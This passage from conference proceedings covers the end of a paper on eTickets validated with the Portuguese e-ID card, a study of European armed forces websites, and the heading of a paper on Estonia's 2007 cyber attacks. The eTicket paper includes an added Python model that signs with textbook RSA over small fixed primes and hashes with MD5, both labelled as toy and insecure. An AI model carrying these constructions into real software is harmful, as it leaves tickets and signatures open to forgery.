Figure 9: The eTicket attributes before applying the hash function
4. The result of the previous cryptographic operation is a digital signature of the eTicket, which is given the name "Ticket-Control". At this stage, the Ticket-Control enables one to identify unequivocally the owner of the ticket.
5. After constructing the Ticket-Control, three parallel operations are performed: (i) the Ticket-Control is stored in the Merchant's back office, (ii) the QR-Code that contains a digital representation of the Ticket-Control is constructed and (iii), most crucially and importantly, the eTicket is divided into two parts of differing sizes:
The smaller part is the first 4 bytes (see Fig 10) of the eTicket (the hash). To this is added a reference tag to identify this data as originating from a secure eTicket and a simple 10-byte checksum (see Fig 11). The importance of the identifying tag is that it enables the customer to track and identify the ticket on the national ID card. The checksum is needed to eliminate any data errors and ambiguities that may arise in the data transmission. This data is then written onto the e-ID card. In the case of the Portuguese card there is a maximum of 1 Kbyte of data that the card holder may read/write.
Figure 10: The construction of the eTicket
The second, larger part is the remaining 12 bytes (see Fig 10). This data is also encapsulated with a tag and checksum and sent to the merchant. This data will be necessary in order to perform a strong authentication of the client and eTicket.
Figure 11: Example of the data held on the Portuguese e-ID
6. The final stage is to send the QR-Code containing the Ticket-Control to the client's mobile, either by sending an MMS or via NFC.
5. Secure authentication at the merchant
The final part of our system is the act of authentication between the client and the Merchant. This is the point where the client receives the goods or services that have been paid for. As explained in section 4.1, three different authentication scenarios have been defined; their implementation is now described.
5.1 The weak authentication process
The weak authentication process consists of obtaining the QR-Code via one of three possible technologies on the merchant's side. This can be decoded and the Ticket-Control obtained. In this simple case all that is necessary is that the Merchant compares this Ticket-Control to the one in the Merchant's back office information system, see Fig 12. Weak authentication is advantageous in scenarios where ticket validation needs to be rapid. In these cases the value of the ticket is usually limited and as such it is not necessary to have a demanding security framework, for example access to public transportation or entrance to concerts, theatre and cinema that do not require high security.
Figure 12: Weak validation process
5.2 Strong authentication process
As in the weak validation process, the first step is to obtain and decode the MMS in order to obtain the Ticket-Control. The next step is to validate the Ticket-Control, Fig 13, but in this case we wish to provide proof that the client is indeed the purchaser of the goods or services being requested. This is established using the following procedure.
Figure 13: Strong authentication process
1. The merchant has the Ticket-Control plus ¾ of the original eTicket.
2. The client introduces his e-ID card into the Merchant's card reader to obtain the remaining ¼. This way the Merchant is able to obtain the complete eTicket.
3. The merchant then requests that the client sign the eTicket using his PIN, thereby re-creating the Ticket-Control.
4. At this point it is possible for the Merchant to compare the Ticket-Control that he has just recreated with the Ticket-Control in his back office information system.
5. Should it be necessary, the merchant can additionally request the Ticket-Control the client received on his mobile phone, thereby preventing any problems associated with theft of the e-ID card. In this case, if the three Ticket-Controls are equal then the ticket is valid.
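The construction steps of section 4.3.1 and the strong validation just described can be followed end to end in the following Python model. It is an added example written for this edition, not code from the paper or from the Ticket-ID project. It assumes a tag value (TKID), a checksum construction (the first 10 bytes of a SHA-1 digest) and a canonical ordering of the Fig 9 attributes, none of which the paper specifies, and it replaces the Citizen Card's on-chip SHA1/RSA signing with a textbook RSA over small fixed primes so that the script runs offline; the MD5 hash is kept because the paper specifies it. It goes slightly beyond the text by also providing a verify() routine, which checks the Ticket-Control against the card's public key instead of asking the client to re-sign.

```python
import hashlib

TAG = b"TKID"          # assumption: marker tag identifying a secure eTicket record
CHECKSUM_LEN = 10      # the paper's "simple 10 byte checksum"
NOTEBOOK_SIZE = 1024   # Portuguese CC citizen-writable area, 1 Kbyte (section 6.2)
CARD_PART = 4          # first 4 bytes of the eTicket go to the card, the other 12 to the merchant


class ToyCitizenCard:
    """Stand-in for the CC's IAS applet and notebook. The real card signs with SHA1/RSA
    on-chip and never exports the key; textbook RSA over fixed small primes keeps this
    runnable offline (assumption: toy parameters, deliberately not secure)."""

    def __init__(self, signature_pin: str, primes=(1000000007, 998244353)):
        p, q = primes                                # constructed toy primes
        self._n, e = p * q, 65537
        self._d = pow(e, -1, (p - 1) * (q - 1))
        self.public_key = (self._n, e)               # in reality taken from the card's certificate
        self._pin = signature_pin
        self.notebook = bytearray()                  # the private writable area

    def sign(self, data: bytes, pin: str) -> bytes:
        """Deterministic, as PKCS#1 v1.5 RSA is, so a re-signature can be compared byte for byte."""
        if pin != self._pin:                         # the signature PIN confirms the operation
            raise PermissionError("wrong signature PIN")
        h = int.from_bytes(hashlib.sha1(data).digest(), "big") % self._n
        return pow(h, self._d, self._n).to_bytes(8, "big")

    def notebook_write(self, record: bytes) -> None:
        if len(self.notebook) + len(record) > NOTEBOOK_SIZE:
            raise MemoryError("e-ID notebook full: the client must free space first")
        self.notebook += record

    def notebook_records(self, size: int):
        """Yield the fixed-size records that carry TAG, i.e. tickets tracked on the card."""
        for i in range(0, len(self.notebook), size):
            rec = bytes(self.notebook[i:i + size])
            if rec.startswith(TAG):
                yield rec


def verify(public_key, data: bytes, signature: bytes) -> bool:
    """Check a Ticket-Control with the card's public key; needs no PIN entry."""
    n, e = public_key
    h = int.from_bytes(hashlib.sha1(data).digest(), "big") % n
    return pow(int.from_bytes(signature, "big"), e, n) == h


def wrap(payload: bytes) -> bytes:
    """TAG + payload + checksum (assumption: checksum = first 10 bytes of SHA-1 of the rest)."""
    body = TAG + payload
    return body + hashlib.sha1(body).digest()[:CHECKSUM_LEN]


def unwrap(record: bytes) -> bytes:
    """Strip TAG and checksum; a damaged or foreign record raises ValueError."""
    body, chk = record[:-CHECKSUM_LEN], record[-CHECKSUM_LEN:]
    if not body.startswith(TAG) or hashlib.sha1(body).digest()[:CHECKSUM_LEN] != chk:
        raise ValueError("record is corrupt or not a secure eTicket record")
    return body[len(TAG):]


def build_eticket(attributes: dict) -> bytes:
    """Step 2: canonicalise the Fig 9 attributes and hash them. MD5 is what the paper
    specifies and is kept here; a new deployment would use SHA-256."""
    canonical = "|".join(f"{k}={attributes[k]}" for k in sorted(attributes)).encode()
    return hashlib.md5(canonical).digest()           # the 16-byte eTicket


def payment_agent_issue(card, pin: str, attributes: dict, back_office: dict) -> str:
    """Steps 2-6: hash, sign on the card, split 4/12, store both halves, return the QR payload."""
    eticket = build_eticket(attributes)
    ticket_control = card.sign(eticket, pin)         # steps 3-4: the "Ticket-Control"
    card.notebook_write(wrap(eticket[:CARD_PART]))   # smaller part -> e-ID notebook
    back_office[ticket_control] = wrap(eticket[CARD_PART:])  # larger part -> merchant
    return ticket_control.hex()                      # step 6: what the QR-Code / MMS carries


def weak_validate(qr_payload: str, back_office: dict) -> bool:
    """Section 5.1: the Ticket-Control decoded from the QR-Code must be on file."""
    return bytes.fromhex(qr_payload) in back_office


def strong_validate(card, pin: str, qr_payload: str, back_office: dict) -> bool:
    """Section 5.2: rebuild the eTicket from the card's 4 bytes and the merchant's 12,
    have the client re-sign it on the card, and compare with the stored Ticket-Control."""
    control = bytes.fromhex(qr_payload)              # step 1: Ticket-Control from the phone
    merchant_record = back_office.get(control)
    if merchant_record is None:
        return False
    merchant_part = unwrap(merchant_record)
    for rec in card.notebook_records(len(TAG) + CARD_PART + CHECKSUM_LEN):
        try:
            eticket = unwrap(rec) + merchant_part    # step 2: the complete eTicket
        except ValueError:
            continue                                 # checksum failed: skip the damaged record
        if card.sign(eticket, pin) == control:       # steps 3-5: re-sign and compare
            return True
    return False
```

A typical run creates a ToyCitizenCard with a signature PIN, calls payment_agent_issue() with constructed ticket attributes and an empty back-office dictionary, and then passes the returned QR payload to weak_validate() and strong_validate(). Two points are worth noting for anyone building on the scheme. The comparison in step 4 only works because SHA1 with RSA (PKCS#1 v1.5) produces the same signature every time; with a randomised scheme such as RSA-PSS the merchant would have to verify the signature against the certificate on the card, as verify() does, which also spares the client a second PIN entry. Second, the checksum on each record only detects transmission or storage damage, so strong_validate() skips a record that fails its checksum rather than rejecting the client outright.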
5.3 Strong biometric authentication process
In sensitive environments, for example at airports, it may also be necessary to authenticate the card holder biometrically. In this case, apart from verifying the Ticket-Control, it is also required to identify the citizen who presents the e-ID card. For this the biometric fingerprint validation (Match on Card) functionality of the e-ID card is used. This process, Fig 14, allows a more robust proof that whoever holds the identity card has the identity recorded on the card and hence is the owner of the eTicket (digital signature). Note that this validation process does not add more security from a cryptographic point of view; it does however verify the identity of the document and its owner.
Figure 14: Strong biometric authentication
6. Analysis of the architecture
The advantages and disadvantages of the proposed architecture, its robustness and its resilience to attack are now discussed in brief.
6.1 Fraud
The payment agent has knowledge of the eTicket (hash); however, the possibility of (re)creating a valid but fraudulent eTicket is limited. This is due to the fact that in order to achieve this the payment agent would have to recreate a valid Ticket-Control, and in order to do this the payment agent would need the credentials of the citizen's card (PIN) and the actual card itself, as the signing process is done on the card. Hence the security is as solid as the overall e-ID card security. Note that any Payment Agent should be identified and registered and comply with minimum security requirements.
If the Ticket-Control is compromised, either by theft at, or in transmission to, the back office information system, then the attacker could feasibly use this information. However, it would still be necessary to identify the service/good purchased, and the attacker could only use the ticket in the case where only the simple authentication process was necessary. This opens the interesting possibility of changing a simple authentication to a strong authentication if such a theft is discovered, and of using random spot checks (simple to strong) as a dissuading method.
The system is also safe from more complex attacks, such as the situation where a phone that contains an eTicket for a flight is stolen and the client's national e-ID card is also stolen. In this case the attacker may even know the signing PIN and could thus pass the strong validation, but in this type of scenario it is often necessary to validate the owner of the ticket biometrically, using Match-on-Card, or via some other proof such as possession of a passport.
6.2 e-ID storage capacity
The e-ID cards have a limited private writable information space (notebook); therefore it is up to the client to manage this space efficiently and correctly. Tools can be provided to help the client in this process, either web based or for download, and also made available at the Payment Agent, the Merchant's site etc. In the event of the citizen or another application deleting, by mistake or maliciously, the contents of the e-ID's notebook area, the immediate consequence is that the citizen would be unable to use the ticket if strong authentication was required, since this type of authentication requires the use of the citizen's card and the reconstruction of the Ticket-Control using the information that was on the card. In this case the citizen would have to return to a payment agent to address the problem.
6.3 Robustness
The fact that the eTicket is placed on the e-ID card and not on the phone makes the system robust with respect to theft of the mobile phone. Consider what happens in the event the phone is stolen or the customer loses the Ticket-Control. In this situation the customer must notify a payment agent, who may then change the weak validation process to strong authentication, which implies the use of the citizen's card; in this case the ticket is guaranteed not to be used fraudulently. In the worst-case scenario the e-ID is also stolen, and then an attacker would also have to know the authentication PIN. In this more serious situation, after a client has notified a payment agent of the theft, the system should automatically change a strong validation type to "extra strong", requiring biometric validation.
In situations where the QR-Code cannot be read correctly, for instance if the phone loses battery power or there are problems with image quality, there are several alternatives. In the case of an NFC-enabled mobile phone it may still be possible to use the phone to read the QR-code, as NFC uses magnetic field induction (GSMA 2007) for power. Alternatively the QR-Code can be printed, avoiding image quality problems on the handset. Finally, the client can ask that the authentication level be raised to strong, in which case the QR-Code can be replaced by the e-ID.
7. Conclusions
This paper has described an innovative system using e-ID citizen cards and digital signature mechanisms. The security layer has introduced the concept of three levels of security for the authentication process, which allows the system to be both flexible and able to adapt to the dynamic needs of each of the players involved and the individual event or service requirements. Although associated with ticketing, its implementation in other areas and in other contexts, such as audit trails for confidential documents, could also be advantageous and is being explored.
In conclusion, the architecture described provides a simplified view of the mobile payment authentication and validation environment, which doesn't change the common habits of people and is consistent with modern trends where the mobile is used to store/transport information. It makes use of the best current technologies, NFC/QR-code, in a mobile environment. It makes use of the Portuguese e-ID, a trusted, secure and credible document, to provide a mechanism for flexible, secure authentication and validation of tickets.
References
Crocker, P., de Sousa, S. M. & Nicolau, V. (2010) Sniffing with Portuguese Identity Card for fun and profit, Proceedings of the Ninth European Conf. on Information Warfare and Security (ECIW 2010).
Eched, Y, Billiaert, E & Veyret E. (2009) e-Gov 2.0 The Keys to Success, Gemalto White Paper [online] http://www.epractice.eu/en/library/292758 [Accessed 9 March 2011]
Benito, R et al. (2008) Security Issues in the Context of authentication using mobile devices, Editors: Naumann, I and Hogben, G, European Network and Information Security Agency (ENISA) [online], http://www.enisa.europa.eu/act/it/eid/mobile-eid/at_download/fullReport [Accessed 9 March 2011]
Exame Informática (2010) Movensis e CGD vão estrear pagamentos por telemóveis, [online], http://aeiou.exameinformatica.pt/movensis-e-cgd-vao-estrear-pagamentos-por-telemovel-video=f1007055. [Accessed 9 March 2011]
GSMA (2007), Mobile NFC technical guideline, [online], http://www.gsmworld.com/documents/gsma_nfc2_wp.pdf. [Accessed 9 March 2011]
Hughes, N and Lonie, S (2009) M-Pesa: Mobile money for the unbanked. Innovations: Technology, Governance, Globalization 2007 2:1-2, 63-81
Leenes, R et al (2009) Towards pan-European recognition of electronic ID. The Stork e-ID consortium, [online], https://www.eid-stork.eu/dmdocuments/public/D2.2_final._1.pdf. [Accessed 9 March 2011]
NIST, National Institute of Standards and Technology (2009), Digital Signature Standard, [online], http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf. [Accessed 9 March 2011]
Oberthur (2009) Bank ID for SEB, [online] http://www.oberthur.com [Accessed 9 March 2011]
Rankl, W (2007) Smart Card Applications Design Models for Using and Programming Smart Cards, John Wiley, England.
SIBS (2010) SIBS MB-Phone, [online], http://www.sibs.pt/pt/mb/prodserv/mbphone/. [Accessed 9 March 2011]
Evaluation of the Armed Forces Websites of the European Countries
Pedro Cunha 1, Parcídio Gonçalves 1, Vítor Sá 1, Sérgio Tenreiro de Magalhães 1 and Miguel Pimenta 2
1 Universidade Católica Portuguesa, Braga, Portugal
2 Regimento de Cavalaria 6, Exército Português, Braga, Portugal
pjgscunha@gmail.com
parcidio@gmail.com
vitor.sa@braga.ucp.pt
stmagalhaes@braga.ucp.pt
pimenta.jmas@mail.exercito.pt
Abstract: The armed forces are a critical component of the national security strategy of several European countries. Despite the peace that has followed the Cold War, several armies, in peacetime, have personnel recruited with promises of individual opportunities. Countries have two forms of recruitment for their troops: by volunteering or by mandatory incorporation. Following the trends of the modern world, interconnected in a network, it becomes essential for institutions to mark their presence on the Internet. The Armed Forces in their various branches are no exception; there are numerous sites with relevant information, being used as a channel for dissemination and fundraising. Since young people represent a large share of the population using the Internet, and this is the target population for recruitment, it becomes mandatory to use the Internet as a communication channel with them. A qualitative study of all sites of European armed forces, and their branches, was carried out in order to assess their quality and differences. The approach focused on the evaluation of the sites for their ability to inform, how up to date they are, quantity and quality of content, service availability, usability and visual attractiveness, and ease of communication. The study also tried to verify whether the countries with volunteer incorporation were producing websites of higher quality, reflecting the need to invest in order to recruit. On the other hand, countries with compulsory incorporation could have lower investment in their websites, since the satisfaction of the need for staff is guaranteed. We considered 38 countries, with an initial usability study in which data were collected about the characteristics considered important for the proper construction of a website as well as for a good and easy relationship with the user of this type of site. This research defined the parameters to evaluate the sites, and groups were created with the parameters of the different areas of analysis of those sites. The evaluation shows that there are differences in the quality of the sites for each of the countries evaluated in terms of graphics, usability and content, and that the greatest difference between the countries is in the number of existing sites per country. It is clear that there are countries that invest strategically in this area while others do not. It was also clear that there is a difference between Eastern and Western Europe in the quality of, and the investment made in, the sites of their armed forces. Dividing the countries by their incorporation system, the differences are smaller, both in terms of the number of sites for the military and in the average assessment of each scheme. In countries where incorporation is mandatory, investment in independent sites for each branch has not been neglected by a considerable part of the countries, a little more than half. But it is in countries where recruitment is made on a voluntary basis that there are more sites for the different branches, which may indicate existing competitiveness in staff recruitment.
Keywords: armed forces, websites, recruitment, Europe
1. Introduction
The aftermath of the Second World War led to a growing concern for the safety of the population. This led many European countries to take concrete actions, embodied in adherence to collective defence organizations (NATO and the Warsaw Pact) and in the reorganization of their armed forces, to ensure the integrity of their territory and the security of their populations. This feeling of security and insecurity, embodied in the mutual fear that characterized the Cold War, would end only with the demise of the Soviet Union in 1991. In this period of nearly 40 years, large numbers of civilians were recruited into the armed forces of most European countries, in many cases leading to armed forces oversized relative to the real needs of those countries. Conscription was the standard practice for maintaining the staff levels seen as necessary.
This situation changed from 1991. The level of conventional threat against European countries was substantially reduced, and since then the non-conventional threat has received greater attention from the states and organizations responsible for security. Inevitably, the armed forces followed this change, feeling an increasing need to favour quality over quantity. The technological evolution of military equipment, catalysed by the incessant demand for more efficient weapons systems to cope with an increasingly effective enemy, requires increasingly better prepared military personnel. This reality has led some European countries to evolve towards different systems of recruitment and training, better adapted to the new reality and to the new weapons systems.
Therefore, it is interesting to understand the reality of the armed forces of European countries by analysing the recruiting method they use and whether the information published on their websites changes the number and the quality of the civilians who present themselves to serve their armed forces and their countries.
1.1 State of the art
The armed forces are an integral part of society in the various countries of Europe. According to Anna Leander, they are important for integrating society, forming political organizations, securing civil states and controlling the use of violence in society (Leander, 2004). According to Stanislav Andreski, military organizations influence the social structure, especially by determining the distribution of power or, in other words, the ability to use violence (Andreski, 1968). As noted previously, society is constantly evolving, and the various branches of the armed forces have felt the need to follow these developments. As stated by Alfred Vagts, each stage of social progress or regression has produced military institutions in accordance with its needs and ideas, its culture and its economy (Vagts, 1981).
One of the factors with the most influence on the paradigm shift of the armed forces, in Europe and in the rest of the world, was the end of the Cold War. As noted by John J. Mearsheimer, the profound changes under way in Europe were widely seen as harbingers of a new era of peace; with the end of the Cold War, it was said that the threat of war that had loomed over Europe for over four decades was evaporating (Mearsheimer, 1990).
In the last three decades the peacetime army has recruited with promises of individual opportunity: money for college, professional skills, achievement, adventure and personal transformation. At the outset of a controversial war, many of those promises sounded inappropriate, if not absurd (Bailey, 2007). Because of this reality, and during this period, the military's relationship with market logic changed, naturally and almost invisibly. This change was an unintended consequence of the change to the voluntary regime (Bailey, 2007).
Some European countries have decided to end conscription as a result of geopolitical change and the limited utility of conscripts for post-Cold War missions, although other European countries plan to maintain conscription despite these same factors. Thus, the extinction of conscription is probable in armies that seek to reduce the number of recruits, while it is likely to be maintained in armies that aim to increase their numbers and in militia-type armies (Jehn & Selden, 2002). The European countries that continue to use conscription have cited its alleged budgetary savings almost as their only justification. In the present post-Cold War period, conscription may not end in Europe, but its importance is no longer relevant (Jehn & Selden, 2002).
The armed forces are also shaped by recruitment advertising, since advertising can reach a greater number of the recruitment-age population more quickly and economically. Military advertising tries to prompt the relatively low-cost act of contacting a recruiter or visiting the army website (Bailey, 2007). The Internet, with its increasing number of sites used as an advertising medium, has become an undeniable reality of the information age in which we live. The armed forces, being part of society and of the world, are using it as a channel for dissemination and recruitment. According to John Thompson, the development of communication media has changed the nature of communication in contemporary society in a profound and irreversible way (Thompson, 1995).
Networks are very old forms of human practice, but they took on new life in our time by becoming information networks, fuelled by the Internet (Castells, 2002). Since young people represent a large share of the population using the Internet, and they are the target population for recruitment, using the Internet as a communication channel becomes mandatory.
1.2 The problem
The adoption of the Internet as a means of communication by the armed forces raises the question of its effectiveness and its real significance for the society at which it is aimed, taking into account the shrinking population of military age and distinguishing between countries that need voluntary recruitment and those with compulsory military service.
With this article, we intend to carry out a qualitative study of all the websites of the European armed forces and their branches, in order to assess their quality and their differences. The approach focuses on assessing the sites in the following aspects: their ability to inform, how up to date they are, the quantity and quality of their content, service availability, usability and visual attractiveness, and ease of communication. We also examine whether countries where enlistment is voluntary invest more in the sites of their armed forces, and how the quality of those sites compares with that of countries in which military service is compulsory.
2. Methodology
This article presents a qualitative study of the websites of the European armed forces, considering the following 38 countries: Albania, Austria, Belarus, Belgium, Bosnia and Herzegovina, Bulgaria, Croatia, the Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Hungary, Ireland, Italy, Latvia, Lithuania, Luxembourg, Macedonia, Malta, Moldova, Montenegro, the Netherlands, Norway, Poland, Portugal, Romania, Russia, Serbia, Slovakia, Slovenia, Spain, Sweden, Switzerland, Ukraine and the United Kingdom. The following countries were excluded from the evaluation for not having armed forces: Andorra, Iceland, Liechtenstein, Monaco, San Marino and the Vatican. Cyprus was also excluded because of its diplomatic complexity, since that territory has two armed forces, one on the Greek side and another on the Turkish side (CIA, 2011).
We started with research on website usability. For this purpose we consulted the site http://www.usability.gov, from which we collected information on the characteristics considered important for the proper construction of a website and for a good and easy relationship with its users. We also consulted and analysed the book Research-Based Web Design & Usability Guidelines (Leavitt & Shneiderman, 2007). This research defined the parameters used to evaluate the sites, and the parameters were grouped by area of analysis: homepage; layout; pagination and scrolling; headers; titles and labels; links; appearance of text; lists; widgets; graphics, images and multimedia content; organization; and search. Since the sites were assessed separately by more than one person, each evaluating a share of the sites of the European armed forces, and to avoid subjectivity in the evaluation, we recorded only whether each site met each assessment parameter, as a Boolean value (0 or 1). During the assessment each parameter received its value; the values of the parameters in a group were then added together and divided by the number of parameters in that group, giving the final score for the group. The values were recorded and processed in a spreadsheet, and the results are presented later in this article. The final assessment ranges from a minimum of 0 to a maximum of 8.79. This maximum is the sum of the maximum values of all assessed groups, each of which is the sum of the relative importance of the group's parameters divided by the number of parameters in the group.
3. Analysis
The first step of this study was to locate all the websites of the European armed forces for later analysis. One obstacle was the difficulty of finding the intended sites, since some armed forces do not have a website, as is the case for Macedonia and Moldova. We also found one site under construction, Malta's, which precluded its analysis. Throughout the evaluation we encountered a variety of site designs, some more complex and some simpler, but in general relatively easy to use. For the evaluation we considered the sites of the main branches of the armed forces: army, navy and air force. In some cases we also considered the site of the country's ministry of defence, because it contains information about the branches of the armed forces as well as links to the sites of those branches.
3.1 General assessment of all countries
After a qualitative analysis of all the sites, we were able to verify that the scores obtained by the countries under review do not differ greatly, as shown in Figure 1.
Figure 1: Scores of all assessed countries (bar chart of the obtained scores on a scale from 0.00 to 6.00, with one bar each for Albania, Germany, Austria, Belarus, Belgium, Bosnia and Herzegovina, Bulgaria, Croatia, Denmark, Slovakia, Slovenia, Spain, Estonia, Finland, France, Greece, the Netherlands, Hungary, Ireland, Italy, Latvia, Lithuania, Luxembourg, Montenegro, Norway, Poland, Portugal, the United Kingdom, the Czech Republic, Romania, Russia, Serbia, Sweden, Switzerland and Ukraine)
In absolute terms, the minimum score was obtained by Belarus, with 3.02, and the maximum by Sweden, with 5.49. These represent 34.34% and 62.50% respectively of the maximum possible score. Most countries, however, scored between 50% and 60% of the maximum, with an average of 54.38%, which indicates a satisfactory classification of the evaluated sites. This is presented in Figure 2 and in Table 1.
Throughout the analysis we found a reasonable investment by most European armed forces in their sites, revealing on average a good level of information updating, a pleasant graphic layout and simplicity of use. This shows a technological sensitivity to the greater need and willingness to disclose information relevant to society, with the objective, in some cases, of attracting new members to the forces. Despite this investment, countries differ in whether they have only one website for all the branches of the armed forces (Albania, Belarus, Bosnia and Herzegovina, Bulgaria, Croatia, Slovenia, Luxembourg, the Czech Republic, Russia, Serbia and Ukraine), representing 32.43% of the countries; a website for two of the branches, sometimes with one site for those branches and a global site covering all of them (Austria, Slovakia, Hungary and Switzerland), representing 11.43% of the evaluated websites; or a website for each of the existing branches (Germany, Belgium, Denmark, Spain, Finland, France, Greece, the Netherlands, Ireland, Italy, Latvia, Lithuania, Montenegro, Norway, Poland, Portugal, the United Kingdom, Romania and Sweden), representing 54.29% of the evaluated websites (Figure 2).
Figure 2: Scores and number of military websites
Table 1: Relative percentage of the maximum score obtained by the assessed countries
Country                  %        Country       %        Country      %        Country          %
Albania                  57.30    Slovakia      52.70    Ireland      55.00    United Kingdom   57.25
Germany                  61.88    Slovenia      54.24    Italy        57.53    Czech Republic   41.41
Austria                  56.57    Spain         58.51    Latvia       49.57    Romania          55.30
Belarus                  34.34    Estonia       55.16    Lithuania    58.18    Russia           54.40
Belgium                  55.52    Finland       53.56    Luxembourg   55.53    Serbia           60.68
Bosnia and Herzegovina   49.02    France        58.24    Montenegro   52.38    Sweden           62.50
Bulgaria                 46.05    Greece        54.88    Norway       54.23    Switzerland      58.97
Croatia                  52.68    Netherlands   57.87    Poland       57.69    Ukraine          55.92
Denmark                  54.02    Hungary       48.99    Portugal     55.23
Another value obtained was the percentage of countries whose sites include recruitment links: 68.57% of the countries have at least one website linking to a recruitment page, while 31.43% do not.
3.2 Voluntary versus mandatory incorporation
One of the significant elements of this study was the type of incorporation adopted in each country: 18 of the evaluated countries have voluntary enlistment, while the other 17 have mandatory military service.
Contrary to what was expected, the countries with mandatory service obtained a better average in the website evaluation, 55.45%, than the countries that need to convince citizens to volunteer for service, 53.37% (Figure 3).
Figure 3: Scores and number of sites in both mandatory and voluntary incorporation countries
Concerning the number of sites in each incorporation regime, 61.11% of the countries with voluntary service have several sites, one for each branch of the armed forces, while this happens in only 47.06% of the countries with mandatory incorporation. This shows that countries with voluntary incorporation have a higher level of investment in the creation of armed forces websites.
Of the countries with one website for each branch of the armed forces, 28.57% have a mandatory incorporation system and 71.43% have voluntary incorporation; 35.71% are from Eastern Europe and 64.29% from the rest of Europe. The countries with a lower investment in the number of websites, having only one website for all the military branches, have the following distribution: 56.25% have mandatory incorporation and 43.75% voluntary incorporation; 81.25% are from Eastern Europe and only 18.75% from the rest of Europe.
Another significant indicator of the importance of the armed forces websites in each country is the existence, or not, of a recruitment link, which makes it easier for those interested in joining the armed forces to obtain relevant information about the process and/or to register for incorporation. 77.78% of the countries with voluntary service have such a link, while that happens in 58.82% of the countries with a mandatory incorporation system.
3.3 Eastern Europe versus Western Europe
During the evaluation the difference in investment between Eastern and Western countries was perceptible, both in the number of armed forces websites and in the quality of the existing websites. This was objectively confirmed by the final results, as can be seen in Figure 4.
Figure 4: Score and number of websites of Western and Eastern Europe countries
Although they are scarcer in some of the information provided, such as specific websites for each branch of the armed forces, the difference in average classification between the Eastern European countries and the rest of the European countries is not considerable, with the Eastern countries scoring 52.00% and the others 56.90%. Despite this, there is a large difference in the number of armed forces websites per country: many more Eastern European countries have only one general website for all the military branches than Western European countries. Only 27.78% of the Eastern European countries have one website for each military branch, while 72.22% do not. In Western Europe the scenario is the opposite, with 82.35% of the countries providing a specific website for each branch of the armed forces. There is also a large difference between Eastern and Western European countries regarding recruitment links: 88.24% of the Western European countries have such a link, while only 50% of the Eastern European countries do.
4. Conclusions
The evaluation performed allows several conclusions to be drawn regarding the web communication policies of the European countries, through the analysis of the quality of their websites in terms of graphics, usability and content.
The Spanish website www.soldados.com stands out as an example of quality in graphics, ease of use, completeness of the menus, virtual maps indicating missions, interactive games, etc. Another demonstration of investment in this field is the Norwegian case: Norway has recently launched another domain, complementing the mil.no domain with access through the forsvaret.no domain (forsvaret means defence). At the other extreme are countries like Belarus, with a very poorly constructed website (http://www.mod.mil.by).
The data collected show that the biggest difference in the Internet communication strategy of the European countries lies in the number of military websites: 81.25% of the countries that do not have one website for each branch of the armed forces are located in Eastern Europe. The existence of a difference in the quality of the military websites of Eastern and Western European countries is clearly established.
The differences found obviously have underlying causes, forcing us to examine and understand not only the current situation but also the likely future development of these tools. We cannot ignore, as causes of these differences, the conflicts that occurred in Europe over the past 20 years, among which we highlight the Balkans, Chechnya, Georgia and the war against terrorism, and the political changes associated with German reunification after the fall of the Berlin Wall and with the collapse of the former Soviet Union, whose break-up gave rise to a considerable number of independent countries, also considered in this paper. These new countries, now awakened to the need for armed forces, have started the process of developing their security and defence.
Looking specifically at the countries of Eastern Europe, with few exceptions, the results reflect a constant found in almost all of them. Most of these countries live off their natural resources, or "rent" their territory so that oil and gas pipelines can reach other destinations. This reality tilts the development of these countries towards what is necessary for their survival. Thus the working middle class, which a country needs to be strong in order not to compromise its development, is negligible or non-existent. The main difference lies precisely here. For a middle class to exist there must be education, which necessarily leads to development, technology and information. The degree of unfamiliarity with, and inability to use, these tools does not catalyse their development, with the result that the analysis of several sites turned out worse in these countries than in other European countries.
Another important and curious issue concerns the development evident in the armed forces of the countries of the former USSR. The results show that the sites of these countries contribute to a holistic view of the military, because most of them have a single website for all branches of the armed forces. Typically this view is associated with a voluntary form of recruitment, which in this case is contradicted by the results found. This leads us to conclude that the armed forces of these countries are rapidly advancing, having already surpassed the old concepts of epirocracy and thalassocracy, very common in the armed forces of the former USSR and based essentially on a system of conscription.
When countries are classified by their incorporation method, the differences are smaller, both in the number of websites and in the results of their quality evaluation (the difference in average score was only 2.08%, in favour of those with mandatory incorporation). It is also noticeable that there was no reduction in the investment in the quality of the military websites in more than 50% of the countries with mandatory incorporation. This contradicts the initial hypothesis of this work, which expected countries with voluntary incorporation to have higher standards for their websites as a means of better reaching their potential candidates.
References
Andreski, S. (1968) Military Organization and Society, University of California Press.
Bailey, B. (2007) "The Army in the Marketplace: Recruiting an All-Volunteer Force", The Journal of American History, Vol 94, No. 1, pp 47-74.
Castells, M. (2002) The Internet Galaxy: Reflections on the Internet, Business, and Society, Oxford University Press.
CIA (2011) "The World Factbook – Europe", [online], https://www.cia.gov/library/publications/the-world-factbook/wfbExt/region_eur.html.
Jehn, C. and Selden, Z. (2002) "The End of Conscription in Europe?", Contemporary Economic Policy, Vol 20, No. 2, pp 93-100.
Leander, A. (2004) "Drafting Community: Understanding the Fate of Conscription", Armed Forces & Society, Vol 30, No. 4, pp 571-599.
Leavitt, M.O. and Shneiderman, B. (2007) Research-Based Web Design & Usability Guidelines, GSA.
Mearsheimer, J.J. (1990) "Back to the Future: Instability in Europe after the Cold War", International Security, Vol 15, No. 1, pp 5-56.
Thompson, J.B. (1995) The Media and Modernity: A Social Theory of the Media, Stanford University Press.
Vagts, A. (1981) A History of Militarism: Civilian and Military, Greenwood Press.
Estonia After the 2007 Cyber Attacks: Legal, Strategic and Organisational Changes in Cyber Security
Christian Czosseck, Rain Ottis and Anna-Maria Talihärm
Cooperative Cyber Defence Centre of Excellence, Tallinn, Estonia
Christian.Czosseck@ccdcoe.org
Rain.Ottis@ccdcoe.org
Anna-Maria.Taliharm@ccdcoe.org
